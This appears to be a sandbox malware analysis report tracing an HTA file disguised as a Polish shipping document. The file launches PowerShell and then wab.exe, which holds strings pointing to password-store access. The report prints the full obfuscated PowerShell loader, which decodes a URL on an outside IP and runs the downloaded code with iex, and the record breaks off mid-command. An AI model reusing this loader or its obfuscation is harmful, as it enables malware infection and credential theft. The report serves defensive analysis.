Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 1_2_02D9A16C |
1_2_02D9A16C |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 1_2_02D90FF3 |
1_2_02D90FF3 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 1_2_02D91044 |
1_2_02D91044 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 1_2_02D916AD |
1_2_02D916AD |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 1_2_02D9166D |
1_2_02D9166D |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 10_2_22C9B5C1 |
10_2_22C9B5C1 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 10_2_22CA7194 |
10_2_22CA7194 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_0044B040 |
16_2_0044B040 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_0043610D |
16_2_0043610D |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_00447310 |
16_2_00447310 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_0044A490 |
16_2_0044A490 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_0040755A |
16_2_0040755A |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_0043C560 |
16_2_0043C560 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_0044B610 |
16_2_0044B610 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_0044D6C0 |
16_2_0044D6C0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_004476F0 |
16_2_004476F0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_0044B870 |
16_2_0044B870 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_0044081D |
16_2_0044081D |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_00414957 |
16_2_00414957 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_004079EE |
16_2_004079EE |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_00407AEB |
16_2_00407AEB |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_0044AA80 |
16_2_0044AA80 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_00412AA9 |
16_2_00412AA9 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_00404B74 |
16_2_00404B74 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_00404B03 |
16_2_00404B03 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_0044BBD8 |
16_2_0044BBD8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_00404BE5 |
16_2_00404BE5 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_00404C76 |
16_2_00404C76 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_00415CFE |
16_2_00415CFE |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_00416D72 |
16_2_00416D72 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_00446D30 |
16_2_00446D30 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_00446D8B |
16_2_00446D8B |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 16_2_00406E8F |
16_2_00406E8F |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_00405038 |
19_2_00405038 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_0041208C |
19_2_0041208C |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_004050A9 |
19_2_004050A9 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_0040511A |
19_2_0040511A |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_0043C13A |
19_2_0043C13A |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_004051AB |
19_2_004051AB |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_00449300 |
19_2_00449300 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_0040D322 |
19_2_0040D322 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_0044A4F0 |
19_2_0044A4F0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_0043A5AB |
19_2_0043A5AB |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_00413631 |
19_2_00413631 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_00446690 |
19_2_00446690 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_0044A730 |
19_2_0044A730 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_004398D8 |
19_2_004398D8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_004498E0 |
19_2_004498E0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_0044A886 |
19_2_0044A886 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_0043DA09 |
19_2_0043DA09 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_00438D5E |
19_2_00438D5E |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_00449ED0 |
19_2_00449ED0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_0041FE83 |
19_2_0041FE83 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 19_2_00430F54 |
19_2_00430F54 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 22_2_004050C2 |
22_2_004050C2 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 22_2_004014AB |
22_2_004014AB |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 22_2_00405133 |
22_2_00405133 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 22_2_004051A4 |
22_2_004051A4 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 22_2_00401246 |
22_2_00401246 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 22_2_0040CA46 |
22_2_0040CA46 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 22_2_00405235 |
22_2_00405235 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 22_2_004032C8 |
22_2_004032C8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 22_2_00401689 |
22_2_00401689 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 22_2_00402F60 |
22_2_00402F60 |
Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence'; |
Source: wab.exe, wab.exe, 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q); |
Source: wab.exe, 0000000A.00000002.3241755873.0000000023440000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger'); |
Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0 |
Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s; |
Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s; |
Source: wab.exe, 00000010.00000002.2660982925.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2661558073.0000000004651000.00000004.00000020.00020000.00000000.sdmp, chp6361.tmp.16.dr |
Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key)); |
Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp |
Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' |
Source: unknown |
Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta" |
|
Source: C:\Windows\SysWOW64\mshta.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvn |